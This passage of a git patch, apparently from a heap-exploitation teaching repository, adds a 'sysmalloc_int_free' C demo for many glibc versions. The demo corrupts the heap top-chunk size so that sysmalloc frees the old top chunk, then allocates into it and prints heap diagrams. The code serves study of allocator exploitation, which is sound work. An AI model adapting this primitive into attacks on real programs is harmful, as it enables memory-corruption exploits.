From 4ed6f1954565ed12e23aa84931ed9c36d00a3d8b Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:08:01 -0700 Subject: [PATCH 1/3] enable sysmalloc_int_free --- Makefile | 22 ++-- glibc_2.23/sysmalloc_int_free.c | 5 + glibc_2.24/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.27/sysmalloc_int_free.c | 3 +- glibc_2.31/sysmalloc_int_free.c | 3 +- glibc_2.32/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.33/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.34/sysmalloc_int_free.c | 3 +- glibc_2.35/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.36/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.37/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.38/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ 12 files changed, 1282 insertions(+), 14 deletions(-) create mode 100644 glibc_2.24/sysmalloc_int_free.c create mode 100644 glibc_2.32/sysmalloc_int_free.c create mode 100644 glibc_2.33/sysmalloc_int_free.c create mode 100644 glibc_2.35/sysmalloc_int_free.c create mode 100644 glibc_2.36/sysmalloc_int_free.c create mode 100644 glibc_2.37/sysmalloc_int_free.c create mode 100644 glibc_2.38/sysmalloc_int_free.c diff --git a/Makefile b/Makefile index 905feaa..7a51557 100644 --- a/Makefile +++ b/Makefile @@ -1,15 +1,15 @@ BASE = malloc_playground first_fit calc_tcache_idx -V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack -V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack -V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack -V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink -V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack 
mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water +V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free +V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free +V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free +V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar 
house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free +V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) diff --git a/glibc_2.23/sysmalloc_int_free.c b/glibc_2.23/sysmalloc_int_free.c index 0d8c055..b1974a2 100644 --- a/glibc_2.23/sysmalloc_int_free.c +++ b/glibc_2.23/sysmalloc_int_free.c @@ -9,6 +9,7 @@ #define SIZE_SZ sizeof(size_t) #define CHUNK_HDR_SZ (SIZE_SZ*2) +// 
same for x86_64 and x86 #define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) @@ -27,6 +28,10 @@ /** * Tested on: * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) * * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, * which can be used to corrupt heap without needing to call free() directly. diff --git a/glibc_2.24/sysmalloc_int_free.c b/glibc_2.24/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.24/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. 
create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... 
|\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.27/sysmalloc_int_free.c b/glibc_2.27/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.27/sysmalloc_int_free.c +++ b/glibc_2.27/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.31/sysmalloc_int_free.c b/glibc_2.31/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.31/sysmalloc_int_free.c +++ b/glibc_2.31/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.32/sysmalloc_int_free.c b/glibc_2.32/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.32/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. 
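+ *
+ * [Editor's note, not part of the upstream patch] The forged top chunk still has to
+ * look sane to sysmalloc, which is why this demo only shrinks its size while keeping
+ * it page aligned and leaving PREV_INUSE set. A paraphrased sketch of that check,
+ * using glibc-internal identifiers from the 2.39 malloc.c region that the L2599 link
+ * further down in this file points at (exact wording varies between versions):
+ *
+ *   old_top  = av->top;
+ *   old_size = chunksize (old_top);
+ *   old_end  = (char *) (chunk_at_offset (old_top, old_size));
+ *   assert ((old_top == initial_top (av) && old_size == 0) ||
+ *           ((unsigned long) (old_size) >= MINSIZE &&
+ *            prev_inuse (old_top) &&
+ *            ((unsigned long) old_end & (pagesize - 1)) == 0));
+ *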
+ * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. 
create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.33/sysmalloc_int_free.c b/glibc_2.33/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.33/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. 
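+ *
+ * [Editor's note, not part of the upstream patch] The FENCEPOST constant defined above
+ * mirrors what sysmalloc carves off the old top before handing it to _int_free, as the
+ * next lines describe. A paraphrased sketch of that path, based on glibc 2.39 malloc.c
+ * around the L2895/L2913 links used in this file (details differ in older releases):
+ *
+ *   // the old top could not be merged with the newly obtained memory:
+ *   old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK;
+ *   set_head (old_top, old_size | PREV_INUSE);
+ *   // ... two small fencepost headers are written just past old_top + old_size ...
+ *   if (old_size >= MINSIZE)
+ *     _int_free (av, old_top, 1);   // the "free() without calling free()"
+ *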
+ * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk 